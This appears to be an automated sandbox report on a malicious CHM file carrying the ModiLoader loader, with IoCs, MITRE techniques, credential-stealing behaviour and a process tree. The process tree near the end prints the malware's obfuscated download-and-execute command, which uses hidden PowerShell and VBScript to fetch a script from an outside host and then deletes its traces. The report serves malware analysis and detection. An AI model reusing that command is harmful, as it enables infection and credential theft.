modiloader | 6f11bddb792856673d09d12e15662d70fa98d16da50d28b21aba4873b6c75fc9

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18-01-2025 13:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmpapw1h1a2.chm
Size

75KB
MD5

0e7a4e127728e1e48a95c1928606c0af
SHA1

ec2a102bdda50542f50d4f64f71c48bb9ffea693
SHA256

6f11bddb792856673d09d12e15662d70fa98d16da50d28b21aba4873b6c75fc9
SHA512

7edc1f22041efb93b28e8bfcf9762d3b623f85f43e0bbec32353156e536551be8484394ee8250c3844099ae73bba664acd780c71efa5cc3c3b0748b5539b9c2a
SSDEEP

1536:d4bv2j4YkkT/O1Kr426/wtN7NctHKfTKPG4vWl/Mf9ZViM59gp/:SbqoL1C4ytNMqfmPGd69/C5

Score

10^/10

modiloader collection defense_evasion discovery execution persistence spyware stealer trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader

ModiLoader Second Stage 61 IoCs

resource	yara_rule
behavioral2/memory/4756-50-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-55-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-58-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-64-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-72-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-85-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-106-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-113-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-112-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-110-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-109-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-108-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-107-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-104-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-102-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-100-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-99-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-96-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-94-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-92-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-90-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-111-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-89-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-87-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-86-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-105-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-84-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-83-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-103-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-82-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-101-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-81-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-98-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-80-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-97-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-79-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-95-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-78-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-93-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-77-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-91-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-76-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-75-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-88-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-74-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-73-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-71-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-70-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-69-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-68-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-67-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-66-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-65-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-63-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-62-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-61-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-60-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-59-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-57-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-56-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2
behavioral2/memory/4756-54-0x0000000002920000-0x0000000003920000-memory.dmp	modiloader_stage2

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3124	powershell.exe
2144	powershell.exe
5092	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	xgtukcbW.pif
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	Trading_AIBot.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk	Trading_AIBot.exe

Executes dropped EXE 20 IoCs

pid	Process
3928	ript.exe
4756	x.exe
1132	svchost.pif
4400	alpha.pif
3888	Upha.pif
2456	alpha.pif
1624	Upha.pif
2700	alpha.pif
4392	aken.pif
2612	xgtukcbW.pif
2872	alg.exe
1272	DiagnosticsHub.StandardCollector.Service.exe
5068	fxssvc.exe
2460	elevation_service.exe
4932	Microsofts.exe
1600	Trading_AIBot.exe
216	elevation_service.exe
224	maintenanceservice.exe
4808	OSE.EXE
1140	apihost.exe

Loads dropped DLL 1 IoCs

pid	Process
1132	svchost.pif

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Microsofts.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Microsofts.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Microsofts.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wbckutgx = "C:\\Users\\Public\\Wbckutgx.url"	x.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
4472	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	drive.google.com
30	drive.google.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
55	checkip.dyndns.org
61	reallyfreegeoip.org
62	reallyfreegeoip.org

Drops file in System32 directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\d16fed4d3e6c0d63.bin	alg.exe
File opened for modification	C:\Windows\system32\dllhost.exe	xgtukcbW.pif
File opened for modification	C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	xgtukcbW.pif
File opened for modification	C:\Windows\system32\dllhost.exe	alg.exe
File opened for modification	C:\Windows\system32\fxssvc.exe	alg.exe
File opened for modification	C:\Windows\system32\AppVClient.exe	xgtukcbW.pif
File opened for modification	C:\Windows\system32\fxssvc.exe	xgtukcbW.pif
File opened for modification	C:\Windows\system32\AppVClient.exe	alg.exe
File opened for modification	C:\Windows\System32\alg.exe	xgtukcbW.pif

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4756 set thread context of 2612	4756	x.exe	129

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\native2ascii.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\policytool.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\wsimport.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\klist.exe	alg.exe
File opened for modification	C:\Program Files\Internet Explorer\ielowutil.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\idlj.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\kinit.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\unpack200.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdate.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\ExtExport.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javapackager.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jhat.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\orbd.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\rmid.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_87843\javaws.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jstatd.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\servertool.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\schemagen.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\unpack200.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\ktab.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\policytool.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\javacpl.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\klist.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javac.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jps.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\klist.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\123.0.6312.123\chrome_installer.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Install\{86C113DF-C14A-4A2D-BFB2-2F0FC039BBA8}\chrome_installer.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jconsole.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jabswitch.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\private_browsing.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jrunscript.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\keytool.exe	alg.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\uninstall.exe	alg.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	alg.exe
File opened for modification	C:\Program Files\7-Zip\7zG.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jdb.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\jjs.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateOnDemand.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe	alg.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javaw.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jinfo.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\tnameserv.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\xjc.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\rmid.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\maintenanceservice.exe	alg.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	alg.exe
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	xgtukcbW.pif

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apihost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Microsofts.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xgtukcbW.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trading_AIBot.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5112	taskkill.exe

Modifies data under HKEY_USERS 5 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1130 = "Microsoft Modem Device Provider"	fxssvc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1134 = "Microsoft Routing Extension"	fxssvc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1131 = "Route through e-mail"	fxssvc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1132 = "Store in a folder"	fxssvc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1133 = "Print"	fxssvc.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2700	schtasks.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	30	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	33	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1140	apihost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2144	powershell.exe
2144	powershell.exe
5092	powershell.exe
5092	powershell.exe
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
4392	aken.pif
1132	svchost.pif
1132	svchost.pif
4392	aken.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif
1132	svchost.pif

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
660	Process not Found
660	Process not Found
660	Process not Found

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	2144	powershell.exe
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeDebugPrivilege	5112	taskkill.exe
Token: SeDebugPrivilege	4392	aken.pif
Token: SeTakeOwnershipPrivilege	2612	xgtukcbW.pif
Token: SeDebugPrivilege	2612	xgtukcbW.pif
Token: SeAuditPrivilege	5068	fxssvc.exe
Token: SeDebugPrivilege	4932	Microsofts.exe
Token: SeDebugPrivilege	1600	Trading_AIBot.exe
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeDebugPrivilege	1140	apihost.exe
Token: SeDebugPrivilege	2872	alg.exe
Token: SeDebugPrivilege	2872	alg.exe
Token: SeDebugPrivilege	2872	alg.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3604	hh.exe
3604	hh.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3604 wrote to memory of 4472	3604	hh.exe	83
PID 3604 wrote to memory of 4472	3604	hh.exe	83
PID 4472 wrote to memory of 3276	4472	cmd.exe	85
PID 4472 wrote to memory of 3276	4472	cmd.exe	85
PID 4472 wrote to memory of 2144	4472	cmd.exe	86
PID 4472 wrote to memory of 2144	4472	cmd.exe	86
PID 2144 wrote to memory of 3928	2144	powershell.exe	87
PID 2144 wrote to memory of 3928	2144	powershell.exe	87
PID 4472 wrote to memory of 5092	4472	cmd.exe	89
PID 4472 wrote to memory of 5092	4472	cmd.exe	89
PID 5092 wrote to memory of 3672	5092	powershell.exe	90
PID 5092 wrote to memory of 3672	5092	powershell.exe	90
PID 4472 wrote to memory of 5112	4472	cmd.exe	92
PID 4472 wrote to memory of 5112	4472	cmd.exe	92
PID 3672 wrote to memory of 4736	3672	cmd.exe	95
PID 3672 wrote to memory of 4736	3672	cmd.exe	95
PID 3672 wrote to memory of 4756	3672	cmd.exe	96
PID 3672 wrote to memory of 4756	3672	cmd.exe	96
PID 3672 wrote to memory of 4756	3672	cmd.exe	96
PID 4756 wrote to memory of 3640	4756	x.exe	109
PID 4756 wrote to memory of 3640	4756	x.exe	109
PID 4756 wrote to memory of 3640	4756	x.exe	109
PID 4756 wrote to memory of 5108	4756	x.exe	111
PID 4756 wrote to memory of 5108	4756	x.exe	111
PID 4756 wrote to memory of 5108	4756	x.exe	111
PID 5108 wrote to memory of 1132	5108	cmd.exe	114
PID 5108 wrote to memory of 1132	5108	cmd.exe	114
PID 1132 wrote to memory of 1400	1132	svchost.pif	115
PID 1132 wrote to memory of 1400	1132	svchost.pif	115
PID 1400 wrote to memory of 5076	1400	cmd.exe	118
PID 1400 wrote to memory of 5076	1400	cmd.exe	118
PID 1400 wrote to memory of 3432	1400	cmd.exe	119
PID 1400 wrote to memory of 3432	1400	cmd.exe	119
PID 1400 wrote to memory of 4356	1400	cmd.exe	120
PID 1400 wrote to memory of 4356	1400	cmd.exe	120
PID 1400 wrote to memory of 4400	1400	cmd.exe	121
PID 1400 wrote to memory of 4400	1400	cmd.exe	121
PID 4400 wrote to memory of 3888	4400	alpha.pif	122
PID 4400 wrote to memory of 3888	4400	alpha.pif	122
PID 1400 wrote to memory of 2456	1400	cmd.exe	123
PID 1400 wrote to memory of 2456	1400	cmd.exe	123
PID 2456 wrote to memory of 1624	2456	alpha.pif	124
PID 2456 wrote to memory of 1624	2456	alpha.pif	124
PID 1400 wrote to memory of 2700	1400	cmd.exe	125
PID 1400 wrote to memory of 2700	1400	cmd.exe	125
PID 2700 wrote to memory of 4392	2700	alpha.pif	126
PID 2700 wrote to memory of 4392	2700	alpha.pif	126
PID 4756 wrote to memory of 2612	4756	x.exe	129
PID 4756 wrote to memory of 2612	4756	x.exe	129
PID 4756 wrote to memory of 2612	4756	x.exe	129
PID 4756 wrote to memory of 2612	4756	x.exe	129
PID 4756 wrote to memory of 2612	4756	x.exe	129
PID 2612 wrote to memory of 1600	2612	xgtukcbW.pif	136
PID 2612 wrote to memory of 1600	2612	xgtukcbW.pif	136
PID 2612 wrote to memory of 1600	2612	xgtukcbW.pif	136
PID 2612 wrote to memory of 4932	2612	xgtukcbW.pif	137
PID 2612 wrote to memory of 4932	2612	xgtukcbW.pif	137
PID 2612 wrote to memory of 4932	2612	xgtukcbW.pif	137
PID 1600 wrote to memory of 3124	1600	Trading_AIBot.exe	141
PID 1600 wrote to memory of 3124	1600	Trading_AIBot.exe	141
PID 1600 wrote to memory of 3124	1600	Trading_AIBot.exe	141
PID 1600 wrote to memory of 2700	1600	Trading_AIBot.exe	142
PID 1600 wrote to memory of 2700	1600	Trading_AIBot.exe	142
PID 1600 wrote to memory of 2700	1600	Trading_AIBot.exe	142

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Microsofts.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Microsofts.exe

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\tmpapw1h1a2.chm
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3604
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PS.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
  2⤵
  - Hide Artifacts: Hidden Window
  - Suspicious use of WriteProcessMemory
  PID:4472
- - C:\Windows\system32\extrac32.exe
    extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe
    3⤵
    PID:3276
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PS.cmd C:\\Users\\Public\\df.cmd"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2144
  - - C:\Users\Public\ript.exe
      "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PS.cmd C:\\Users\\Public\\df.cmd
      4⤵
      Executes dropped EXE
      PID:3928
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\df.cmd" "
      4⤵
